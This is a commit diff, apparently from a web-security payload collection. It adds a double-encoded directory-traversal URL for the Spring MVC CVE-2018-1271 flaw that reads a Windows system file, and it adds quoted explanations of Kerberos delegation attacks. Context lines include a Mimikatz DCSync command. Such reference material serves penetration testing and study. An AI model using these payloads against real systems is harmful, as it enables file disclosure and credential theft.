Directory Traversal CVE 2018 Spring
parent
98124178db
commit
6baa446144
|
@ -70,6 +70,8 @@ Sometimes you encounter a WAF which remove the "../" characters from the strings
|
||||||
\ = %255c
|
\ = %255c
|
||||||
```
|
```
|
||||||
|
|
||||||
|
**e.g:** Spring MVC Directory Traversal Vulnerability (CVE-2018-1271) with `http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini`
|
||||||
|
|
||||||
### UNC Bypass
|
### UNC Bypass
|
||||||
|
|
||||||
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
|
An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software system to potentially redirect access to an unintended location or arbitrary file.
|
||||||
|
|
|
@ -628,6 +628,8 @@ domainA.local domainB.local TreeRoot Bidirectional
|
||||||
|
|
||||||
### Unconstrained delegation
|
### Unconstrained delegation
|
||||||
|
|
||||||
|
> The user sends a TGS to access the service, along with their TGT, and then the service can use the user’s TGT to request a TGS for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||||
|
|
||||||
#### Find delegation
|
#### Find delegation
|
||||||
|
|
||||||
Check the `TrustedForDelegation` property.
|
Check the `TrustedForDelegation` property.
|
||||||
|
@ -678,6 +680,10 @@ Then you can use DCsync or another attack : `Mimikatz> lsadump::dcsync /user:HAC
|
||||||
|
|
||||||
### Resource-Based Constrained Delegation
|
### Resource-Based Constrained Delegation
|
||||||
|
|
||||||
|
Resource-based Constrained Delegation was introduced in Windows Server 2012.
|
||||||
|
|
||||||
|
> The user sends a TGS to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a TGS for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
||||||
|
|
||||||
1. Import **Powermad** and **Powerview**
|
1. Import **Powermad** and **Powerview**
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
|
|
@ -4,9 +4,7 @@ A list of useful payloads and bypasses for Web Application Security.
|
||||||
Feel free to improve with your payloads and techniques !
|
Feel free to improve with your payloads and techniques !
|
||||||
I :heart: pull requests :)
|
I :heart: pull requests :)
|
||||||
|
|
||||||
You can also contribute with a :beers: IRL or with `buymeacoffee.com`
|
You can also contribute with a :beers: IRL
|
||||||
|
|
||||||
[![Coffee](https://www.buymeacoffee.com/assets/img/custom_images/orange_img.png)](https://buymeacoff.ee/swissky)
|
|
||||||
|
|
||||||
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
|
Every section contains the following files, you can use the `_template_vuln` folder to create a new chapter:
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue